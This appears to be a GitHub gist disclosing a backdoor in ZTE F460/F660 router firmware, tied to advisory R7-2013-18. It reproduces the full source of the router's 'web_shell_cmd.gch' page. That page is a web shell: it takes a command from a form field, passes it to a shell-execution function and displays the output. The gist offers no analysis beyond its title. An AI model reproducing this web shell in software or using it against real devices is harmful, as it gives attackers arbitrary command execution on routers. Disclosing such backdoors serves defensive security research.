Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
R7-2013-18, ZTE F460 and ZTE F660 web_shell_cmd.gch Backdoor
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>
F460 Webshell
</title>
<LINK REL="stylesheet" HREF="css/login.css" TYPE="text/css" />
<LINK REL="stylesheet" HREF="css/template.css" TYPE="text/css" />
<style>
* {
margin: 0 0 0 0;
padding: 0;
}
.textarea_1 {
height:420px;
width:794px;
border:1px solid #7F9DB7;
font-size: 12px;
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
text-align:left;
}
#e8_container {
margin: 0 auto;
width: 800px;
text-align: left;
position: relative;
min-height: 600px;
height: 600px;
height: 600px;
}
#banner {
width:800px;
height:70px;
}
.bottom_td3 {
width:800px;
background-color:#eeeeee;
margin-right:2px;
text-align:right;
}
.copyright {
float:left;
display:block;
height:16px;
width:800px;
padding-top:10px;
border-left:1px solid #B1B1B1;
border-right:1px solid #B1B1B1;
text-align:center;
}
.bottom_line {
float:left;
display:block;
background-color:#5aa929;
height:8px;
width:800px;
}
.type{
position:absolute;
top:32px;left:540px;
font:20px Arial,sans-serif;
color:#fff;z-index:999;
}
.inputId {
width:720px;
}
table.table td.td11 {
width:30%;
height:24px;
text-align:right;
}
</style>
<script language="javascript">
function getObj(id) {
return (document.getElementById(id));
}
function jslSetValue(src, dst) {
var ss = document.getElementById(dst).value;
document.getElementById(src).value = ss;
}
function setValue(id, value) {
document.getElementById(id).value = value;
}
function Transfer_meaning(id, value) {
document.getElementById(id).value = value;
}
function getValue(id) {
return (document.getElementById(id).value);
}
function jslDisable(id) {
var i;
var num = jslDisable.arguments.length;
if (num == 0) return;
for (i = 0; i < num; i++) {
document.getElementById(arguments[i]).disabled = true;
}
}
var CMD_PARA = new Array(
"Cmd",
"CmdAck"
);
function pageLoad(url) {
getObj("running").style.display = "none";
}
function pageSetValue() {
jslSetValue("Cmd", "Frm_Cmd");
}
function pageSubmit() {
jslDisable("Btn_Submit");
pageSetValue();
setValue("IF_ACTION", "apply");
getObj("running").style.display = "";
getObj("running_title").innerHTML = "it is running, please wait...";
getObj("fSubmit").submit();
}
</script>
<%
IMPORT FILE "common_gch.gch";
var FP_ERRORSTR = "SUCC";
var FP_PARANUM = 2;
var PARA[2] =
{
"Cmd",
"CmdAck"
};
create_form_start("fSubmit", "'/web_shell_cmd.gch'");
createBasicHidden();
create_hidden_newpara(PARA, FP_PARANUM);
var CmdAck="";
var Cmd = request("Cmd");
var FP_ACTION = request("IF_ACTION");
if(FP_ACTION == "apply")
{
CmdAck = show_shellcmd(Cmd);
}
getDisplayInstError(FP_ERRORSTR);
undoDBSave();
create_form_end();
%>
</head>
<body>
<div id="e8_container" style="background-color:#eeeeee;">
<div id="head">
<div id="banner" style="background-image:url(img/banner.gif); background-repeat:no-repeat"></div>
</div>
<table class="table" width="500px" border="0" align="center">
<tr>
</tr>
<tr id="running" class="white" style="display: none;">
<td>
<font id="running_title" style="display: ;"></font>&nbsp;&nbsp;<img src="img/uploading.gif">
</td>
</tr>
<tr>
<td class="td3" colspan="2">
</td>
</tr>
<tr>
<td class="td11" id="Fnt_Cmd">Command: </td>
<td class="td2">
<input name="textfield22" type="text" id="Frm_Cmd" class="inputId" value="" size="150" />
</td>
</tr>
<tr>
<td colspan="2" align="right">
<input name='Submit' type='button' id='Btn_Submit' onclick=pageSubmit() class='button' value=' Submit ' /></td>
</tr>
<br>
<tr>
<td class="td3" colspan="2">
<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1"><%=CmdAck;%></textarea>
</td>
</tr>
</table>
<br>
</div>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment